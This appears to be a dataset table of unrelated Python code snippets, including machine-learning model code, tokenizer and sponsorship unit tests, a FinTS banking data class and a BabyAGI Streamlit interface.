code stringlengths 281 23.7M |
|---|
def valid(args, train_env, val_envs, rank=(- 1)):
default_gpu = is_default_gpu(args)
agent_class = SoonGMapObjectNavAgent
agent = agent_class(args, train_env, rank=rank)
if (args.resume_file is not None):
print(('Loaded the listener model at iter %d from %s\n' % (agent.load(args.resume_file), args.resume_file)))
if default_gpu:
with open(os.path.join(args.log_dir, 'validation_args.json'), 'w') as outf:
json.dump(vars(args), outf, indent=4)
record_file = os.path.join(args.log_dir, 'valid.txt')
write_to_record_file((str(args) + '\n\n'), record_file)
for (env_name, env) in val_envs.items():
if os.path.exists(os.path.join(args.pred_dir, ('submit_%s.json' % env_name))):
continue
agent.logs = defaultdict(list)
agent.env = env
iters = None
start_time = time.time()
agent.test(use_dropout=False, feedback='argmax', iters=iters)
print(env_name, ('cost time: %.2fs' % (time.time() - start_time)))
preds = agent.get_results()
preds = merge_dist_results(all_gather(preds))
if default_gpu:
if ('test_v2' not in env_name):
(score_summary, _) = env.eval_metrics(preds)
loss_str = ('Env name: %s' % env_name)
for (metric, val) in score_summary.items():
loss_str += (', %s: %.2f' % (metric, val))
write_to_record_file((loss_str + '\n'), record_file)
if args.submit:
json.dump(preds, open(os.path.join(args.pred_dir, ('submit_%s.json' % env_name)), 'w'), sort_keys=True, indent=4, separators=(',', ': ')) |
class Effect5570(BaseEffect):
type = 'passive'
def handler(fit, src, context, projectionRange, **kwargs):
for attrName in ('buffDuration', 'warfareBuff1Value', 'warfareBuff2Value', 'warfareBuff3Value', 'warfareBuff4Value'):
fit.modules.filteredItemBoost((lambda mod: (mod.item.requiresSkill('Skirmish Command') or mod.item.requiresSkill('Shield Command') or mod.item.requiresSkill('Armored Command'))), attrName, src.getModifiedItemAttr('subsystemBonusMinmatarOffensive'), skill='Minmatar Offensive Systems', **kwargs) |
class TANMedia5(DataElementGroup):
tan_medium_class = CodeField(enum=TANMediaClass4, _d='TAN-Medium-Klasse')
status = CodeField(enum=TANMediumStatus, _d='Status')
security_function = DataElementField(type='num', required=False, _d='Sicherheitsfunktion, kodiert')
card_number = DataElementField(type='id', required=False, _d='Kartennummer')
card_sequence = DataElementField(type='id', required=False, _d='Kartenfolgenummer')
card_type = DataElementField(type='num', required=False, _d='Kartenart')
account = DataElementGroupField(type=Account3, required=False, _d='Kontonummer Auftraggeber')
valid_from = DataElementField(type='dat', required=False, _d='Gultig ab')
valid_until = DataElementField(type='dat', required=False, _d='Gultig bis')
tan_list_number = DataElementField(type='an', max_length=20, required=False, _d='TAN-Listennummer')
tan_medium_name = DataElementField(type='an', max_length=32, required=False, _d='Bezeichnung des TAN-Mediums')
mobile_number_masked = DataElementField(type='an', max_length=35, required=False, _d='Mobiltelefonnummer, verschleiert')
mobile_number = DataElementField(type='an', max_length=35, required=False, _d='Mobiltelefonnummer')
sms_charge_account = DataElementGroupField(type=KTI1, required=False, _d='SMS-Abbuchungskonto')
number_free_tans = DataElementField(type='num', max_length=3, required=False, _d='Anzahl freie TANs')
last_use = DataElementField(type='dat', required=False, _d='Letzte Benutzung')
active_since = DataElementField(type='dat', required=False, _d='Freigeschaltet am') |
class BasicBlock(nn.Module):
def __init__(self, in_chan, out_chan, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(in_chan, out_chan, stride)
self.bn1 = nn.BatchNorm2d(out_chan)
self.conv2 = conv3x3(out_chan, out_chan)
self.bn2 = nn.BatchNorm2d(out_chan)
self.relu = nn.ReLU(inplace=True)
self.downsample = None
if ((in_chan != out_chan) or (stride != 1)):
self.downsample = nn.Sequential(nn.Conv2d(in_chan, out_chan, kernel_size=1, stride=stride, bias=False), nn.BatchNorm2d(out_chan))
def forward(self, x):
residual = self.conv1(x)
residual = F.relu(self.bn1(residual))
residual = self.conv2(residual)
residual = self.bn2(residual)
shortcut = x
if (self.downsample is not None):
shortcut = self.downsample(x)
out = (shortcut + residual)
out = self.relu(out)
return out |
def get_rmm_device_memory_usage() -> Optional[int]:
def get_rmm_memory_resource_stack(mr) -> list:
if hasattr(mr, 'upstream_mr'):
return ([mr] + get_rmm_memory_resource_stack(mr.upstream_mr))
return [mr]
try:
import rmm
except ImportError:
return None
for mr in get_rmm_memory_resource_stack(rmm.mr.get_current_device_resource()):
if isinstance(mr, rmm.mr.TrackingResourceAdaptor):
return mr.get_allocated_bytes()
if isinstance(mr, rmm.mr.StatisticsResourceAdaptor):
return mr.allocation_counts['current_bytes']
return None |
def __compute_folding_ranges(tree, lines):
folding_ranges = {}
stack = [tree]
while (len(stack) > 0):
node = stack.pop(0)
if isinstance(node, tree_nodes.Newline):
continue
if isinstance(node, tree_nodes.PythonErrorNode):
(start_line, _) = node.start_pos
start_line -= 1
padding = ([''] * start_line)
text = ('\n'.join((padding + lines[start_line:])) + '\n')
identation_ranges = __compute_folding_ranges_identation(text)
folding_ranges = __merge_folding_ranges(folding_ranges, identation_ranges)
break
if (not isinstance(node, SKIP_NODES)):
valid = __check_if_node_is_valid(node)
if valid:
(start_line, end_line, stack) = __compute_start_end_lines(node, stack)
if (end_line > start_line):
current_end = folding_ranges.get(start_line, (- 1))
folding_ranges[start_line] = max(current_end, end_line)
if hasattr(node, 'children'):
stack = (node.children + stack)
folding_ranges = sorted(folding_ranges.items())
return folding_ranges |
class ByT5TokenizationTest(TokenizerTesterMixin, unittest.TestCase):
tokenizer_class = ByT5Tokenizer
test_rust_tokenizer = False
def setUp(self):
super().setUp()
tokenizer = ByT5Tokenizer()
tokenizer.save_pretrained(self.tmpdirname)
_property
def t5_base_tokenizer(self):
return ByT5Tokenizer.from_pretrained('google/byt5-small')
def get_tokenizer(self, **kwargs) -> ByT5Tokenizer:
return self.tokenizer_class.from_pretrained(self.tmpdirname, **kwargs)
def get_clean_sequence(self, tokenizer, with_prefix_space=False, max_length=20, min_length=5) -> Tuple[(str, list)]:
toks = []
for i in range(len(tokenizer)):
try:
tok = tokenizer.decode([i], clean_up_tokenization_spaces=False)
except UnicodeDecodeError:
pass
toks.append((i, tok))
toks = list(filter((lambda t: re.match('^[ a-zA-Z]+$', t[1])), toks))
toks = list(filter((lambda t: ([t[0]] == tokenizer.encode(t[1], add_special_tokens=False))), toks))
if ((max_length is not None) and (len(toks) > max_length)):
toks = toks[:max_length]
if ((min_length is not None) and (len(toks) < min_length) and (len(toks) > 0)):
while (len(toks) < min_length):
toks = (toks + toks)
toks_ids = [t[0] for t in toks]
output_txt = tokenizer.decode(toks_ids, clean_up_tokenization_spaces=False)
if ((' ' not in output_txt) and (len(toks_ids) > 1)):
output_txt = ((tokenizer.decode([toks_ids[0]], clean_up_tokenization_spaces=False) + ' ') + tokenizer.decode(toks_ids[1:], clean_up_tokenization_spaces=False))
if with_prefix_space:
output_txt = (' ' + output_txt)
output_ids = tokenizer.encode(output_txt, add_special_tokens=False)
return (output_txt, output_ids)
def test_eos_treatment(self):
tokenizer = self.t5_base_tokenizer
batch_with_eos_added = tokenizer(['hi</s>', 'I went to the gym</s>', '</s>'])
batch_without_eos_added = tokenizer(['hi', 'I went to the gym', ''])
self.assertListEqual(batch_with_eos_added['input_ids'], batch_without_eos_added['input_ids'])
def test_multibytes_char(self):
tokenizer = self.t5_base_tokenizer
src_text = 'Unicode .'
encoded = tokenizer(src_text)
encoded_ids = [88, 113, 108, 102, 114, 103, 104, 35, 229, 133, 175, 49, 1]
self.assertEqual(encoded['input_ids'], encoded_ids)
decoded = tokenizer.decode(encoded_ids)
self.assertEqual(decoded, 'Unicode .</s>')
encoded = tokenizer('e e e e e')
encoded_ids = [104, 35, 198, 171, 35, 198, 172, 35, 198, 173, 35, 198, 174, 1]
self.assertEqual(encoded['input_ids'], encoded_ids)
decoded = tokenizer.decode(encoded_ids)
self.assertEqual(decoded, 'e e e e e</s>')
self.assertEqual(tokenizer.decode(tokenizer.encode('e e e e e')), 'e e e e e</s>')
def test_prepare_batch_integration(self):
tokenizer = self.t5_base_tokenizer
src_text = ['A long paragraph for summarization.', 'Another paragraph for summarization.']
expected_src_tokens = [68, 35, 111, 114, 113, 106, 35, 115, 100, 117, 100, 106, 117, 100, 115, 107, 35, 105, 114, 117, 35, 118, 120, 112, 112, 100, 117, 108, 125, 100, 119, 108, 114, 113, 49, 1, 0]
batch = tokenizer(src_text, padding=True, return_tensors=FRAMEWORK)
self.assertIsInstance(batch, BatchEncoding)
if (FRAMEWORK != 'jax'):
result = list(batch.input_ids.numpy()[0])
else:
result = list(batch.input_ids.tolist()[0])
self.assertListEqual(expected_src_tokens, result)
self.assertEqual((2, 37), batch.input_ids.shape)
self.assertEqual((2, 37), batch.attention_mask.shape)
def test_empty_target_text(self):
tokenizer = self.t5_base_tokenizer
src_text = ['A long paragraph for summarization.', 'Another paragraph for summarization.']
batch = tokenizer(src_text, padding=True, return_tensors=FRAMEWORK)
self.assertIn('input_ids', batch)
self.assertIn('attention_mask', batch)
self.assertNotIn('decoder_input_ids', batch)
self.assertNotIn('decoder_attention_mask', batch)
def test_max_length_integration(self):
tokenizer = self.t5_base_tokenizer
tgt_text = ['Summary of the text.', 'Another summary.']
with tokenizer.as_target_tokenizer():
targets = tokenizer(tgt_text, max_length=32, padding='max_length', truncation=True, return_tensors=FRAMEWORK)
self.assertEqual(32, targets['input_ids'].shape[1])
def test_eos_in_input(self):
tokenizer = self.t5_base_tokenizer
src_text = ['A long paragraph for summarization. </s>']
tgt_text = ['Summary of the text. </s>']
expected_src_tokens = [68, 35, 111, 114, 113, 106, 35, 115, 100, 117, 100, 106, 117, 100, 115, 107, 35, 105, 114, 117, 35, 118, 120, 112, 112, 100, 117, 108, 125, 100, 119, 108, 114, 113, 49, 35, 1]
expected_tgt_tokens = [86, 120, 112, 112, 100, 117, 124, 35, 114, 105, 35, 119, 107, 104, 35, 119, 104, 123, 119, 49, 35, 1]
batch = tokenizer(src_text)
with tokenizer.as_target_tokenizer():
targets = tokenizer(tgt_text)
self.assertEqual(expected_src_tokens, batch['input_ids'][0])
self.assertEqual(expected_tgt_tokens, targets['input_ids'][0])
def test_save_and_load_tokenizer(self):
tokenizers = self.get_tokenizers()
for tokenizer in tokenizers:
with self.subTest(f'{tokenizer.__class__.__name__}'):
self.assertNotEqual(tokenizer.model_max_length, 42)
tokenizers = self.get_tokenizers()
for tokenizer in tokenizers:
with self.subTest(f'{tokenizer.__class__.__name__}'):
tmpdirname = tempfile.mkdtemp()
sample_text = ' He is very happy, UNwanted,running'
before_tokens = tokenizer.encode(sample_text, add_special_tokens=False)
tokenizer.save_pretrained(tmpdirname)
after_tokenizer = tokenizer.__class__.from_pretrained(tmpdirname)
after_tokens = after_tokenizer.encode(sample_text, add_special_tokens=False)
self.assertListEqual(before_tokens, after_tokens)
shutil.rmtree(tmpdirname)
tokenizers = self.get_tokenizers(model_max_length=42)
for tokenizer in tokenizers:
with self.subTest(f'{tokenizer.__class__.__name__}'):
tmpdirname = tempfile.mkdtemp()
sample_text = ' He is very happy, UNwanted,running'
tokenizer.add_tokens(['bim', 'bambam'])
additional_special_tokens = tokenizer.additional_special_tokens
additional_special_tokens.append('new_additional_special_token')
tokenizer.add_special_tokens({'additional_special_tokens': additional_special_tokens})
before_tokens = tokenizer.encode(sample_text, add_special_tokens=False)
tokenizer.save_pretrained(tmpdirname)
after_tokenizer = tokenizer.__class__.from_pretrained(tmpdirname)
after_tokens = after_tokenizer.encode(sample_text, add_special_tokens=False)
self.assertListEqual(before_tokens, after_tokens)
self.assertIn('new_additional_special_token', after_tokenizer.additional_special_tokens)
self.assertEqual(after_tokenizer.model_max_length, 42)
tokenizer = tokenizer.__class__.from_pretrained(tmpdirname, model_max_length=43)
self.assertEqual(tokenizer.model_max_length, 43)
shutil.rmtree(tmpdirname)
def test_special_tokens_initialization_with_non_empty_additional_special_tokens(self):
tokenizer_list = []
if self.test_slow_tokenizer:
tokenizer_list.append((self.tokenizer_class, self.get_tokenizer()))
if self.test_rust_tokenizer:
tokenizer_list.append((self.rust_tokenizer_class, self.get_rust_tokenizer()))
for (tokenizer_class, tokenizer_utils) in tokenizer_list:
with tempfile.TemporaryDirectory() as tmp_dir:
tokenizer_utils.save_pretrained(tmp_dir)
with open(os.path.join(tmp_dir, 'special_tokens_map.json'), encoding='utf-8') as json_file:
special_tokens_map = json.load(json_file)
with open(os.path.join(tmp_dir, 'tokenizer_config.json'), encoding='utf-8') as json_file:
tokenizer_config = json.load(json_file)
added_tokens_extra_ids = [f'<extra_id_{i}>' for i in range(125)]
special_tokens_map['additional_special_tokens'] = (added_tokens_extra_ids + ['an_additional_special_token'])
tokenizer_config['additional_special_tokens'] = (added_tokens_extra_ids + ['an_additional_special_token'])
with open(os.path.join(tmp_dir, 'special_tokens_map.json'), 'w', encoding='utf-8') as outfile:
json.dump(special_tokens_map, outfile)
with open(os.path.join(tmp_dir, 'tokenizer_config.json'), 'w', encoding='utf-8') as outfile:
json.dump(tokenizer_config, outfile)
tokenizer_without_change_in_init = tokenizer_class.from_pretrained(tmp_dir)
self.assertIn('an_additional_special_token', tokenizer_without_change_in_init.additional_special_tokens)
self.assertEqual(['an_additional_special_token'], tokenizer_without_change_in_init.convert_ids_to_tokens(tokenizer_without_change_in_init.convert_tokens_to_ids(['an_additional_special_token'])))
new_added_tokens = (added_tokens_extra_ids + [AddedToken('a_new_additional_special_token', lstrip=True)])
tokenizer = tokenizer_class.from_pretrained(tmp_dir, additional_special_tokens=new_added_tokens)
self.assertIn('a_new_additional_special_token', tokenizer.additional_special_tokens)
self.assertEqual(['a_new_additional_special_token'], tokenizer.convert_ids_to_tokens(tokenizer.convert_tokens_to_ids(['a_new_additional_special_token'])))
def test_decode_single_bytes(self):
tokenizer_list = []
if self.test_slow_tokenizer:
tokenizer_list.append((self.tokenizer_class, self.get_tokenizer()))
if self.test_rust_tokenizer:
tokenizer_list.append((self.rust_tokenizer_class, self.get_rust_tokenizer()))
for (tokenizer_class, tokenizer_utils) in tokenizer_list:
with tempfile.TemporaryDirectory() as tmp_dir:
tokenizer_utils.save_pretrained(tmp_dir)
tokenizer = tokenizer_class.from_pretrained(tmp_dir)
self.assertTrue((tokenizer.decode([255]) == ''))
def test_pretrained_model_lists(self):
pass
def test_get_vocab(self):
pass
def test_pretokenized_inputs(self):
pass
def test_conversion_reversible(self):
pass |
.unit()
.parametrize(('func', 'name', 'expectation', 'expected'), [(task_func, None, does_not_raise(), 'task_func'), (task_func, 'name', does_not_raise(), 'name'), (partial(task_func, x=1), None, does_not_raise(), 'task_func'), (partial(task_func, x=1), 'name', does_not_raise(), 'name'), ((lambda x: None), None, does_not_raise(), '<lambda>'), (partial((lambda x: None), x=1), None, does_not_raise(), '<lambda>'), (1, None, pytest.raises(NotImplementedError, match='Cannot'), None)])
def test_parse_name(func, name, expectation, expected):
with expectation:
result = _parse_name(func, name)
assert (result == expected) |
def parser_options():
parser = argparse.ArgumentParser()
parser.add_argument('--path_opt', default='option/SYDNEY_GaLR.yaml', type=str, help='path to a yaml options file')
opt = parser.parse_args()
with open(opt.path_opt, 'r') as handle:
options = yaml.safe_load(handle)
return options |
def get_test_data(n1, offset, n2):
ih = intelhex.IntelHex()
addr = 0
for i in range_g(n1):
ih[addr] = (addr % 256)
addr += 1
addr += offset
for i in range_g(n2):
ih[addr] = (addr % 256)
addr += 1
sio = StringIO()
ih.write_hex_file(sio)
hexstr = sio.getvalue()
sio.close()
return ((n1 + n2), hexstr, ih) |
def test_singlediode_series(cec_module_params):
times = pd.date_range(start='2015-01-01', periods=2, freq='12H')
effective_irradiance = pd.Series([0.0, 800.0], index=times)
(IL, I0, Rs, Rsh, nNsVth) = pvsystem.calcparams_desoto(effective_irradiance, temp_cell=25, alpha_sc=cec_module_params['alpha_sc'], a_ref=cec_module_params['a_ref'], I_L_ref=cec_module_params['I_L_ref'], I_o_ref=cec_module_params['I_o_ref'], R_sh_ref=cec_module_params['R_sh_ref'], R_s=cec_module_params['R_s'], EgRef=1.121, dEgdT=(- 0.0002677))
out = pvsystem.singlediode(IL, I0, Rs, Rsh, nNsVth)
assert isinstance(out, pd.DataFrame) |
def main():
st.set_page_config(initial_sidebar_state='expanded', page_title='BabyAGI UI', layout='centered')
with st.sidebar:
openai_api_key = st.text_input('Your OpenAI API KEY', type='password')
model_name = st.selectbox('Model name', options=['gpt-3.5-turbo', 'gpt-4', 'text-davinci-003'])
temperature = st.slider(label='Temperature', min_value=0.0, max_value=1.0, step=0.1, value=0.5)
st.title('BabyAGI UI')
objective = st.text_input('Input Ultimate goal', 'Solve world hunger')
first_task = st.text_input('Input Where to start', 'Develop a task list')
max_iterations = st.number_input('Max iterations', value=3, min_value=1, step=1)
button = st.button('Run')
embedding_model = HuggingFaceEmbeddings()
vectorstore = FAISS.from_texts(['_'], embedding_model, metadatas=[{'task': first_task}])
if button:
try:
baby_agi = BabyAGI.from_llm_and_objectives(llm=OpenAI(openai_api_key=openai_api_key, temperature=temperature, model_name=model_name), vectorstore=vectorstore, objective=objective, first_task=first_task, verbose=False)
baby_agi.run(max_iterations=max_iterations)
except Exception as e:
st.error(e) |
class SponsorshipModelTests(TestCase):
def setUp(self):
self.benefits = baker.make(SponsorshipBenefit, _quantity=5, _fill_optional=True)
self.package = baker.make('sponsors.SponsorshipPackage', name='PSF Sponsorship Program', sponsorship_amount=100)
self.package.benefits.add(*self.benefits)
self.sponsor = baker.make('sponsors.Sponsor')
self.user = baker.make(settings.AUTH_USER_MODEL)
def test_control_sponsorship_next_status(self):
states_map = {Sponsorship.APPLIED: [Sponsorship.APPROVED, Sponsorship.REJECTED], Sponsorship.APPROVED: [Sponsorship.FINALIZED], Sponsorship.REJECTED: [], Sponsorship.FINALIZED: []}
for (status, exepcted) in states_map.items():
sponsorship = baker.prepare(Sponsorship, status=status)
self.assertEqual(sponsorship.next_status, exepcted)
def test_create_new_sponsorship(self):
sponsorship = Sponsorship.new(self.sponsor, self.benefits, submited_by=self.user)
self.assertTrue(sponsorship.pk)
sponsorship.refresh_from_db()
current_year = SponsorshipCurrentYear.get_year()
self.assertEqual(sponsorship.submited_by, self.user)
self.assertEqual(sponsorship.sponsor, self.sponsor)
self.assertEqual(sponsorship.applied_on, date.today())
self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
self.assertIsNone(sponsorship.approved_on)
self.assertIsNone(sponsorship.rejected_on)
self.assertIsNone(sponsorship.finalized_on)
self.assertIsNone(sponsorship.start_date)
self.assertIsNone(sponsorship.end_date)
self.assertEqual(sponsorship.level_name, '')
self.assertIsNone(sponsorship.sponsorship_fee)
self.assertIsNone(sponsorship.agreed_fee)
self.assertIsNone(sponsorship.package)
self.assertTrue(sponsorship.for_modified_package)
self.assertEqual(sponsorship.year, current_year)
self.assertEqual(sponsorship.benefits.count(), len(self.benefits))
for benefit in self.benefits:
sponsor_benefit = sponsorship.benefits.get(sponsorship_benefit=benefit)
self.assertTrue(sponsor_benefit.added_by_user)
self.assertEqual(sponsor_benefit.name, benefit.name)
self.assertEqual(sponsor_benefit.description, benefit.description)
self.assertEqual(sponsor_benefit.program, benefit.program)
self.assertEqual(sponsor_benefit.benefit_internal_value, benefit.internal_value)
def test_create_new_sponsorship_with_package(self):
sponsorship = Sponsorship.new(self.sponsor, self.benefits, package=self.package)
self.assertTrue(sponsorship.pk)
sponsorship.refresh_from_db()
self.assertEqual(sponsorship.level_name, 'PSF Sponsorship Program')
self.assertEqual(sponsorship.sponsorship_fee, 100)
self.assertEqual(sponsorship.agreed_fee, 100)
self.assertFalse(sponsorship.for_modified_package)
self.assertEqual(sponsorship.package, self.package)
for benefit in sponsorship.benefits.all():
self.assertFalse(benefit.added_by_user)
def test_create_new_sponsorship_with_package_modifications(self):
benefits = self.benefits[:2]
sponsorship = Sponsorship.new(self.sponsor, benefits, package=self.package)
self.assertTrue(sponsorship.pk)
sponsorship.refresh_from_db()
self.assertTrue(sponsorship.for_modified_package)
self.assertEqual(sponsorship.benefits.count(), 2)
self.assertIsNone(sponsorship.agreed_fee)
for benefit in sponsorship.benefits.all():
self.assertFalse(benefit.added_by_user)
def test_create_new_sponsorship_with_package_added_benefit(self):
extra_benefit = baker.make(SponsorshipBenefit)
benefits = (self.benefits + [extra_benefit])
sponsorship = Sponsorship.new(self.sponsor, benefits, package=self.package)
sponsorship.refresh_from_db()
self.assertTrue(sponsorship.for_modified_package)
self.assertEqual(sponsorship.benefits.count(), 6)
for benefit in self.benefits:
sponsor_benefit = sponsorship.benefits.get(sponsorship_benefit=benefit)
self.assertFalse(sponsor_benefit.added_by_user)
self.assertIn(sponsor_benefit, sponsorship.package_benefits)
sponsor_benefit = sponsorship.benefits.get(sponsorship_benefit=extra_benefit)
self.assertTrue(sponsor_benefit.added_by_user)
self.assertEqual([sponsor_benefit], list(sponsorship.added_benefits))
def test_estimated_cost_property(self):
sponsorship = Sponsorship.new(self.sponsor, self.benefits)
estimated_cost = sum((b.internal_value for b in self.benefits))
self.assertNotEqual(estimated_cost, 0)
self.assertEqual(estimated_cost, sponsorship.estimated_cost)
SponsorshipBenefit.objects.all().update(internal_value=0)
self.assertEqual(estimated_cost, sponsorship.estimated_cost)
def test_approve_sponsorship(self):
start = date.today()
end = (start + timedelta(days=10))
sponsorship = Sponsorship.new(self.sponsor, self.benefits)
self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
self.assertIsNone(sponsorship.approved_on)
sponsorship.approve(start, end)
self.assertEqual(sponsorship.approved_on, timezone.now().date())
self.assertEqual(sponsorship.status, Sponsorship.APPROVED)
self.assertTrue(sponsorship.start_date, start)
self.assertTrue(sponsorship.end_date, end)
def test_exception_if_invalid_date_range_when_approving(self):
start = date.today()
sponsorship = Sponsorship.new(self.sponsor, self.benefits)
self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
self.assertIsNone(sponsorship.approved_on)
with self.assertRaises(SponsorshipInvalidDateRangeException):
sponsorship.approve(start, start)
def test_rollback_sponsorship_to_edit(self):
sponsorship = Sponsorship.new(self.sponsor, self.benefits)
can_rollback_from = [Sponsorship.APPLIED, Sponsorship.APPROVED, Sponsorship.REJECTED]
for status in can_rollback_from:
sponsorship.status = status
sponsorship.save()
sponsorship.refresh_from_db()
sponsorship.rollback_to_editing()
self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
self.assertIsNone(sponsorship.approved_on)
self.assertIsNone(sponsorship.rejected_on)
sponsorship.status = Sponsorship.FINALIZED
sponsorship.save()
sponsorship.refresh_from_db()
with self.assertRaises(InvalidStatusException):
sponsorship.rollback_to_editing()
def test_rollback_approved_sponsorship_with_contract_should_delete_it(self):
sponsorship = Sponsorship.new(self.sponsor, self.benefits)
sponsorship.status = Sponsorship.APPROVED
sponsorship.save()
baker.make_recipe('sponsors.tests.empty_contract', sponsorship=sponsorship)
sponsorship.rollback_to_editing()
sponsorship.save()
sponsorship.refresh_from_db()
self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
self.assertEqual(0, Contract.objects.count())
def test_can_not_rollback_sponsorship_to_edit_if_contract_was_sent(self):
sponsorship = Sponsorship.new(self.sponsor, self.benefits)
sponsorship.status = Sponsorship.APPROVED
sponsorship.save()
baker.make_recipe('sponsors.tests.awaiting_signature_contract', sponsorship=sponsorship)
with self.assertRaises(InvalidStatusException):
sponsorship.rollback_to_editing()
self.assertEqual(1, Contract.objects.count())
def test_raise_exception_when_trying_to_create_sponsorship_for_same_sponsor(self):
sponsorship = Sponsorship.new(self.sponsor, self.benefits)
finalized_status = [Sponsorship.REJECTED, Sponsorship.FINALIZED]
for status in finalized_status:
sponsorship.status = status
sponsorship.save()
new_sponsorship = Sponsorship.new(self.sponsor, self.benefits)
new_sponsorship.refresh_from_db()
self.assertTrue(new_sponsorship.pk)
new_sponsorship.delete()
pending_status = [Sponsorship.APPLIED, Sponsorship.APPROVED]
for status in pending_status:
sponsorship.status = status
sponsorship.save()
with self.assertRaises(SponsorWithExistingApplicationException):
Sponsorship.new(self.sponsor, self.benefits)
def test_display_agreed_fee_for_approved_and_finalized_status(self):
sponsorship = Sponsorship.new(self.sponsor, self.benefits)
sponsorship.sponsorship_fee = 2000
sponsorship.save()
finalized_status = [Sponsorship.APPROVED, Sponsorship.FINALIZED]
for status in finalized_status:
sponsorship.status = status
sponsorship.save()
self.assertEqual(sponsorship.agreed_fee, 2000) |
class UNetDecoder(nn.Module):
def __init__(self, encoder: Union[(PlainConvEncoder, ResidualEncoder)], num_classes: int, n_conv_per_stage: Union[(int, Tuple[(int, ...)], List[int])], deep_supervision, nonlin_first: bool=False):
super().__init__()
self.deep_supervision = deep_supervision
self.encoder = encoder
self.num_classes = num_classes
n_stages_encoder = len(encoder.output_channels)
if isinstance(n_conv_per_stage, int):
n_conv_per_stage = ([n_conv_per_stage] * (n_stages_encoder - 1))
assert (len(n_conv_per_stage) == (n_stages_encoder - 1)), ('n_conv_per_stage must have as many entries as we have resolution stages - 1 (n_stages in encoder - 1), here: %d' % n_stages_encoder)
transpconv_op = get_matching_convtransp(conv_op=encoder.conv_op)
stages = []
transpconvs = []
seg_layers = []
(cross_conv_kernel_size, cross_conv_padding) = (1, 0)
self.start_stage = 1
total_channels = sum(encoder.output_channels[self.start_stage:(- 1)])
self.cross_conv = [nn.Sequential(nn.Conv2d(total_channels, encoder.output_channels[(- (s + 2))], kernel_size=cross_conv_kernel_size, stride=1, padding=cross_conv_padding, bias=False), nn.BatchNorm2d(encoder.output_channels[(- (s + 2))])) for s in range(len(encoder.output_channels[:(- self.start_stage)]))]
self.cross_conv = nn.Sequential(*self.cross_conv)
for s in range(1, n_stages_encoder):
input_features_below = encoder.output_channels[(- s)]
input_features_skip = encoder.output_channels[(- (s + 1))]
stride_for_transpconv = encoder.strides[(- s)]
transpconvs.append(transpconv_op(input_features_below, input_features_skip, stride_for_transpconv, stride_for_transpconv, bias=encoder.conv_bias))
stages.append(StackedConvBlocks(n_conv_per_stage[(s - 1)], encoder.conv_op, (2 * input_features_skip), input_features_skip, encoder.kernel_sizes[(- (s + 1))], 1, encoder.conv_bias, encoder.norm_op, encoder.norm_op_kwargs, encoder.dropout_op, encoder.dropout_op_kwargs, encoder.nonlin, encoder.nonlin_kwargs, nonlin_first))
seg_layers.append(encoder.conv_op(input_features_skip, num_classes, 1, 1, 0, bias=True))
self.stages = nn.ModuleList(stages)
self.transpconvs = nn.ModuleList(transpconvs)
self.seg_layers = nn.ModuleList(seg_layers)
print(f'using my unet'.center(50, '='))
print(f'cross conv: {self.cross_conv}')
def forward(self, skips):
lres_input = skips[(- 1)]
seg_outputs = []
for s in range(len(self.stages)):
x = self.transpconvs[s](lres_input)
dispatch = []
if (s == (len(self.stages) - 1)):
x = torch.cat((x, skips[(- (s + 2))]), 1)
else:
for y in skips[1:(- 1)]:
if (y.shape[(- 1)] < x.shape[(- 1)]):
dispatch.append(F.interpolate(y, x.shape[(- 2):]))
elif (y.shape[(- 1)] > x.shape[(- 1)]):
dispatch.append(F.adaptive_max_pool2d(y, x.shape[(- 2):]))
else:
dispatch.append(y)
dispatch = torch.cat(dispatch, dim=1)
x = torch.cat([x, self.cross_conv[s](dispatch)], dim=1)
x = self.stages[s](x)
if self.deep_supervision:
seg_outputs.append(self.seg_layers[s](x))
elif (s == (len(self.stages) - 1)):
seg_outputs.append(self.seg_layers[(- 1)](x))
lres_input = x
seg_outputs = seg_outputs[::(- 1)]
if (not self.deep_supervision):
r = seg_outputs[0]
else:
r = seg_outputs
return r
def compute_conv_feature_map_size(self, input_size):
skip_sizes = []
for s in range((len(self.encoder.strides) - 1)):
skip_sizes.append([(i // j) for (i, j) in zip(input_size, self.encoder.strides[s])])
input_size = skip_sizes[(- 1)]
assert (len(skip_sizes) == len(self.stages))
output = np.int64(0)
for s in range(len(self.stages)):
output += self.stages[s].compute_conv_feature_map_size(skip_sizes[(- (s + 1))])
output += np.prod([self.encoder.output_channels[(- (s + 2))], *skip_sizes[(- (s + 1))]], dtype=np.int64)
if (self.deep_supervision or (s == (len(self.stages) - 1))):
output += np.prod([self.num_classes, *skip_sizes[(- (s + 1))]], dtype=np.int64)
return output |
class TestKeyedJaggedTensorScripting(unittest.TestCase):
def test_scriptable_forward(self) -> None:
class MyModule(torch.nn.Module):
def forward(self, input: KeyedJaggedTensor) -> KeyedJaggedTensor:
input['any'].values()
input.dist_labels()
input.dist_splits([1, 2])
return KeyedJaggedTensor.dist_init(keys=input.keys(), tensors=input.dist_tensors(), variable_stride_per_key=False, num_workers=2, recat=torch.tensor([]), stride_per_rank=[2, 3])
m = MyModule()
torch.jit.script(m)
def test_scriptable_split(self) -> None:
class MyModule(torch.nn.Module):
def forward(self, input: KeyedJaggedTensor) -> List[KeyedJaggedTensor]:
return input.split([1, 0, 1])
m = MyModule()
torch.jit.script(m)
def test_scriptable_init(self) -> None:
def create_kjt() -> KeyedJaggedTensor:
return KeyedJaggedTensor.from_offsets_sync(values=torch.tensor([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0]), weights=torch.tensor([1.0, 0.5, 1.5, 1.0, 0.5, 1.0, 1.0, 1.5]), keys=['index_0', 'index_1'], offsets=torch.tensor([0, 0, 2, 2, 3, 4, 5, 5, 8], dtype=torch.int32))
def create_vb_kjt() -> KeyedJaggedTensor:
return KeyedJaggedTensor.from_offsets_sync(values=torch.tensor([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0]), weights=torch.tensor([1.0, 0.5, 1.5, 1.0, 0.5, 1.0, 1.0, 1.5]), keys=['index_0', 'index_1'], offsets=torch.tensor([0, 0, 2, 2, 3, 4, 5, 5, 8], dtype=torch.int32), stride_per_key_per_rank=[[2], [4]])
torch.jit.script(create_kjt)
torch.jit.script(create_vb_kjt)
def test_scriptable_empty(self) -> None:
def create_empty() -> KeyedJaggedTensor:
return KeyedJaggedTensor.empty()
